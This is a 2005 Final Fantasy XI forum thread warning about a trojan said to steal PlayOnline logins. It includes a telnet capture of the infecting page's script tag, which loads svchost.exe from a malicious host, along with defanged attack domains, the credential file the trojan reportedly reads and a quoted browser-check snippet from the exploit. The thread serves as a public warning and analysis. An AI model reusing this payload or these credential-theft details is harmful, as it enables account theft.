Please note that I can't read japanese myself and the info are passed to be from a friend living in Japan. He said this is a big news in 2ch forums right now and 50 accounts have been confirmed to be stolen as of October 22nd. Since I can not read japanese nor a computer expert, I can not confirm these information. So I want to pass these informations collected by my friend for everyone to see. Please use your own judgement whether to believe it or not.
here are the related threads from 2ch.
http://live19.2ch.net/test/read.cgi/ogame/1129895797/
http://archives.mmorpgplayer.com/nmz/data/live19.2ch.net/ogame/dat/1129895797.html
http://live19.2ch.net/test/read.cgi/ogame/1130087252/
http://news19.2ch.net/test/read.cgi/news/1130073619/
This trojan/spyware will run itself upon entering a certain websites which I listed below. This spyware will call for an HTML help file "icyfox.chm" and download svhost.exe running on top of windows' process of the same name.
This spyware is NOT detectable by
Norton AntiVirus 2005
Norton Internet Security 2005
Virus Bluster
The following are confirmed to be able to detect it.
AntiVir Win32:Mhtplo-31 > http://ringonoki.net/tool/antiv/antivir.html
Avast! TR/Copiet.B.1 > http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
these are some sites that are found to be spreading this trojan DO NOT TRY TO ENTER THEM I replace all dots with slashes
www-japan213-com = www-1102213-com = 211-100-26-182 It is a Chinese IP
www-1102213-com/ff11help/money.htm
www-1102213-com/ff11help/svchost.exe
www-japan213-com/ff11929/ff11.asp
telnet www-1102213-com 80
Trying 211-100-26-182...
Connected to www-1102213-com.
Escape character is '^]'.
GET HTTP://www-1102213-com/ff11help/money.htm/ HTTP/1.0
HTTP/1.1 200 OK
...
<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www-1102213-com/ff11help/svchost.exe"></SCRIPT>
<SCRIPT language=JavaScript>function sopen()...
They believe it will read POL login information from C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
and store them into C:\gameff11.txt
Edited, Mon Oct 24 07:11:01 2005 by Jazalas
Edited, Thu Nov 10 10:29:58 2005 by Darkflame
- Forums
- Final Fantasy XI
- General Discussion
- Trojan warning. 50 japanese accounts stolen.
Trojan warning. 50 japanese accounts stolen.Follow
#2
Oct 24 2005 at 6:05 AM
Having a look through some of those images, it appears that they're not bluffing either.
Chinese IPs? Trojan viruses?
Possible connection?
Chinese IPs? Trojan viruses?
Possible connection?
#3
Oct 24 2005 at 6:18 AM
Wow...
That's staggering. Can't this be reported to some kind of law authority?
And do SE know about it?
That's staggering. Can't this be reported to some kind of law authority?
And do SE know about it?
#4
Oct 24 2005 at 6:34 AM
another fantasic reason to make sure you have a firewall or two, much less a virus scanner.
#5
Oct 24 2005 at 6:50 AM
Meh, people who do this are sad..
Especiallly Chinese IPs? They can't farm gil efficiently anymore, so they hack. There HAS to be some legality issue in that, even for China.
Especiallly Chinese IPs? They can't farm gil efficiently anymore, so they hack. There HAS to be some legality issue in that, even for China.
#6
Oct 24 2005 at 6:55 AM
Remember, trojan viruses are often related to DDoS attacks.
#7
Oct 24 2005 at 7:01 AM
Common sense is a great defense against trojans, virii and by virtue account theft.
Personally, unless it comes directly from ffxi.archbell.com, I will not download anything to my local drives that relates to FFXI in any way, shape or form. Even then, I'm always skeptical and make great efforts to do my research before doing that.
Guaranteed the people that fall for this **** are just poor uneducated saps that are looking for the latest bot/hack/what-have-you, and can't resist the urge to follow any link that might theoretically satisfy their desire for some advantage or another.
Personally, unless it comes directly from ffxi.archbell.com, I will not download anything to my local drives that relates to FFXI in any way, shape or form. Even then, I'm always skeptical and make great efforts to do my research before doing that.
Guaranteed the people that fall for this **** are just poor uneducated saps that are looking for the latest bot/hack/what-have-you, and can't resist the urge to follow any link that might theoretically satisfy their desire for some advantage or another.
#8
Oct 24 2005 at 7:52 AM
o_O
the passwords aren't encrypted?
the passwords aren't encrypted?
#9
Oct 24 2005 at 8:04 AM
sometimes i'm glad i play on ps2. any info on it effecting (or essentially robbing) SE's servers themselves? or touching ps2 accounts like mine?
#10
Oct 24 2005 at 8:13 AM
Since PS2 users think they're invincible to this stuff, anything can happen, but so far, from what's being said on some boards, its not affecting PS2 users as of yet, but its up to your own stupitiy (give out your POL ID, your password is EASY to figure out)
#11
Oct 24 2005 at 8:25 AM
You dont have to give out you pol ID, it is plainly vissible in the reconnect window on the screen during the sht maintenance (retry/repeat cycle).
I guess all it take's is 1 screen grab and that's your POL ID gone.
Spectator
I guess all it take's is 1 screen grab and that's your POL ID gone.
Spectator
#12
Oct 24 2005 at 8:35 AM
to the OP:
I'm still looking through website for Antivir (the first website that you listed as able to locate this trojan. I haven't found any information regarding my question yet, so I thought I'd see if someone had already found this out.
I'm running McAfee Viruscan already, is Antivir able to co-exist with it, or like most antivirus systems will they end up seeing each other as problems?
I'm still looking through website for Antivir (the first website that you listed as able to locate this trojan. I haven't found any information regarding my question yet, so I thought I'd see if someone had already found this out.
I'm running McAfee Viruscan already, is Antivir able to co-exist with it, or like most antivirus systems will they end up seeing each other as problems?
#13
Oct 24 2005 at 8:44 AM
if you have a good password, then someone having your pol id shouln't be any big deal... I always spend a bit of time on passwords to make sure they aren't easy to guess... sure if you spend long enough you can figure it out... but same goes for... a cure to cancer... if someone gets my password, well they deff worked for it
as to the virus yeah, deff just be careful what websites you go to. Its kinda sad that I use my desktop for important things and then use my laptop if I do any browsing at questionable sites... this eliminates the problem of possibly contaminating my desktop, and I can just re-format my laptop.
as to the virus yeah, deff just be careful what websites you go to. Its kinda sad that I use my desktop for important things and then use my laptop if I do any browsing at questionable sites... this eliminates the problem of possibly contaminating my desktop, and I can just re-format my laptop.
#14
Oct 24 2005 at 8:45 AM
Who says the two progs you posted are clean and some way to get passwords and such by tricking people in a neat scary story about accounts being stolen?
#15
Oct 24 2005 at 9:13 AM
antivir: http://www.free-av.com/ or http://www.download.com/AntiVir-Personal-Edition/3000-2239_4-10322934.html?tag=lst-0-1
#16
Oct 24 2005 at 9:19 AM
I don't trust this at all. Normally when a new trojan comes out, it isn't long before the anti-virus companies share the information and they all update. The idea that two esoteric virus programs can get it and none of the recognizable names can is suspect to me-- personally I'm just forwarding the information to my virus company and asking them if they know anything about it. I don't get scared into installing programs.
#17
Oct 24 2005 at 9:21 AM
44 posts
well there is a good possibility that these trojans contain keyloggers which record every key press made. So even having a good password wont help as it will just record it down anyhow.
#18
Oct 24 2005 at 9:38 AM
Just had a little looksie, did a quick telnet to my cgi server, wget the htm, vim the results, its really rather simple.
The download uses a very old exploit that uses the help files thing, any anti virus programme worth its salt will detect the download process from the page.
How does it work? Bear with me, this is from memory. It uses an exploit in MS Help, that allows MS Help to open and run a command box (cmd.exe) and using command runs scripts that are downloaded.
Should you worry? Not really, go to http://windowsupdate.microsoft.com this vuln was patched a long time ago, as you can tell by the code itself, if it finds a patched browser, it times out:
So breaking it down (rusty), the entire thing is run as one line, && sees to that, == means equals, != means not equal. so if IE = 5.0 and NT = 5.2 but not 5.1 and sp2, or something, then time out, else hit the script.
I actually do remember this one, it downloads the file onto you computer, then gets windows to run the file via help, I read about it a long time ago on a grey hat site, facinating stuff, but IE is very much patched against it.
The download uses a very old exploit that uses the help files thing, any anti virus programme worth its salt will detect the download process from the page.
How does it work? Bear with me, this is from memory. It uses an exploit in MS Help, that allows MS Help to open and run a command box (cmd.exe) and using command runs scripts that are downloaded.
Should you worry? Not really, go to http://windowsupdate.microsoft.com this vuln was patched a long time ago, as you can tell by the code itself, if it finds a patched browser, it times out:
if(ie.indexOf("MSIE 5.0")==-1 &&
ie.indexOf("NT 5.2")==-1&&
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1)
){setTimeout('sopen();',0);}else{ So breaking it down (rusty), the entire thing is run as one line, && sees to that, == means equals, != means not equal. so if IE = 5.0 and NT = 5.2 but not 5.1 and sp2, or something, then time out, else hit the script.
I actually do remember this one, it downloads the file onto you computer, then gets windows to run the file via help, I read about it a long time ago on a grey hat site, facinating stuff, but IE is very much patched against it.
#19
Oct 24 2005 at 10:53 AM
the good password thing was in reply to just getting the pol id.
so just make a difficult password and someone knowing your pol id means nothing...
Quote:
give out your POL ID, your password is EASY to figure out)
so just make a difficult password and someone knowing your pol id means nothing...
#20
Oct 24 2005 at 3:10 PM
fyi, I have very little knowledge when it comes to virus/hacks/security. I purchased EZantivirus and that's the only protection I have until today. I can't comment on the trojan, but looking from the screen shots on 2ch they don't seem fake.
If you have experience/knowledge about trojan/worms/virus/security feel free to point out possibilities and whatnot. I would like to know more about it as well.
If you have experience/knowledge about trojan/worms/virus/security feel free to point out possibilities and whatnot. I would like to know more about it as well.
#21
Oct 24 2005 at 3:26 PM
Quote:
Chinese IPs? Trojan viruses?
Possible connection?
Possible connection?
Yes, it's an elaborate hoax to attempt to educate Japanese Youths in the use of Condoms.
#22
Oct 24 2005 at 3:50 PM
Professor Quinsisdos wrote:
Chinese IPs? Trojan viruses?
Possible connection?
Communist Chinese, cheating?? You dare say! *gasp*
Carbuncle
#23
Oct 24 2005 at 4:16 PM
I think I'm safe, while I play on pc I don't browse the internet from the same computer I play ffxi on. In fact, all that particular pc is used for is ffxi.
#24
Oct 24 2005 at 6:33 PM
grvydude wrote:
the good password thing was in reply to just getting the pol id.
so just make a difficult password and someone knowing your pol id means nothing...
Quote:
give out your POL ID, your password is EASY to figure out)
so just make a difficult password and someone knowing your pol id means nothing...
IF someone figures out your password, its useless without knowing the ID, remember, there is MANY MANY ways to figure out a password, also if its someone that knows you, that makes it easier for them to figure it out :P Trust me..as an ex-hacker, its pretty easy to find out peoples passwords.
Anyway, connection? maybe..still..it does sucks that this happen, but it proves that the JP's account stolen in question was probably major botters/cheaters. Either way, I hate things like this that happens, thats why I refuse to download anything created by someone for FFXI. Especially, like now the "FFXI messenger" thing that a known hacker of kujata is making, thats just pretty much...yeah. either way, this all sucks in general :(
#25
Oct 24 2005 at 7:09 PM
Your POL ID and password are stored in memory in plain text while you are logged in to POL, regardless of whether you have the "Save Password" option selected.
Unfortunately, if you have this trojan, it really doesn't matter how secure your password is.
Unfortunately, if you have this trojan, it really doesn't matter how secure your password is.
#26
Oct 24 2005 at 11:00 PM
Hello everyone,
I can advise to people one set of AntiVirus software that will detect these and other viruses that Norton and McAfee drop the ball on. Its AVG. You can get a free download of it at www.grisoft.com . You will have even stronger protection if you buy the full version and run it with ICS minimally. I have all my PCs in my house networked and protected with nothing getting through. (Also gets rid of that pesky Krepper.C virus that is useless but annoying nonetheless.
Hopefully this helps.
Sincerely
Korde
I can advise to people one set of AntiVirus software that will detect these and other viruses that Norton and McAfee drop the ball on. Its AVG. You can get a free download of it at www.grisoft.com . You will have even stronger protection if you buy the full version and run it with ICS minimally. I have all my PCs in my house networked and protected with nothing getting through. (Also gets rid of that pesky Krepper.C virus that is useless but annoying nonetheless.
Hopefully this helps.
Sincerely
Korde
You cannot post in a locked topic!
Recent Visitors: 274
All times are in CST
Anonymous Guests (274)
- Forums
- Final Fantasy XI
- General Discussion
- Trojan warning. 50 japanese accounts stolen.
© 2024 Fanbyte LLC